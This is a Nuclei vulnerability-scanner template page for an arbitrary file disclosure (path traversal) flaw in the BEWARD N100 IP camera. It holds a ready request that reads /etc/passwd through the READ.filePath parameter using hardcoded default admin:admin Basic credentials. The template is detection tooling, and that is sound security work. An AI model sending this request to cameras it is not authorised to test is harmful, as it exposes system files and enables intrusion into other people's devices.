Skip to content

BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure

ID: beward-ipcamera-disclosure

Severity: high

Author: geeknik

Tags: iot,camera,disclosure,edb

The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API.

id: beward-ipcamera-disclosure
info:
name: BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure
author: geeknik
severity: high
description: The N100 compact color IP camera suffers from an authenticated file disclosure vulnerability. Input passed via the READ.filePath parameter in fileread script is not properly verified before being used to read files. This can be exploited to disclose the contents of arbitrary files via absolute path or via the SendCGICMD API.
reference:
- https://www.exploit-db.com/exploits/46320
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5511.php
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cwe-id: CWE-22
metadata:
max-request: 1
tags: iot,camera,disclosure,edb
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/operator/fileread?READ.filePath=/etc/passwd"
headers:
Authorization: "Basic YWRtaW46YWRtaW4="
matchers-condition: and
matchers:
- type: regex
regex:
- 'root:[x*]:0:0:'
- type: status
status:
- 200
# digest: 4b0a00483046022100e677f167dcc6e35538d59a9ecf26273c8d486bc0995539aa535a47c264cecf190221008f312c4ed2249b3d685936fe8bff7802835fe9edea50be7dba42abf1cdaf052b:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/beward-ipcamera-disclosure.yaml"

View on Github